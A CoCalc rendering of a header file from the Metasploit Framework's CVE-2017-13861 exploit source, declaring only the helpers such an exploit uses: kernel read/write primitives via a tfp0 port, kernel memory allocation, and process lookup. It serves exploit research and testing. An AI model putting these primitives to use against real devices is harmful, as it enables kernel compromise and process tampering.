CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2017-13861/kernel_utils.h
Views: 11780
1
#import <stdio.h>

2
#import <mach-o/loader.h>

3
#import <stdlib.h>

4
#import <fcntl.h>

5
#import <unistd.h>

6
#import <errno.h>

7
#import <mach/mach.h>

8
#import <sys/stat.h>

9


10
// Needed definitions

11
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);

12
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);

13
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);

14
kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);

15
kern_return_t mach_vm_protect (vm_map_t target_task, mach_vm_address_t address,  mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);

16
kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);

17
kern_return_t mach_vm_region(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t *size, vm_region_flavor_t flavor, vm_region_info_t info, mach_msg_type_number_t *infoCnt, mach_port_t *object_name);

18


19
// init function

20
void init_kernel_utils(mach_port_t tfp0, uint64_t kbase);

21
uint64_t get_kernel_slide();

22


23
// kernel memory stuff

24
size_t KernelRead(uint64_t where, void *p, size_t size);

25
uint32_t KernelRead_32bits(uint64_t where);

26
uint64_t KernelRead_64bits(uint64_t where);

27
size_t KernelWrite(uint64_t where, const void *p, size_t size);

28
void KernelWrite_32bits(uint64_t where, uint32_t what);

29
void KernelWrite_64bits(uint64_t where, uint64_t what);

30
void Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length);

31
void Kernel_free(mach_vm_address_t address, vm_size_t size);

32
uint64_t Kernel_alloc(vm_size_t size);

33
uint64_t Kernel_alloc_wired(uint64_t size);

34
int Kernel_strcmp(uint64_t kstr, const char* str);

35


36
// for messing with processes

37
uint64_t proc_of_pid(pid_t pid);

38


39
// used to fix what kexecute returns

40
typedef struct {

41
    uint64_t prev;

42
    uint64_t next;

43
    uint64_t start;

44
    uint64_t end;

45
} kmap_hdr_t;

46
uint64_t ZmFixAddr(uint64_t addr);

47


48


49


50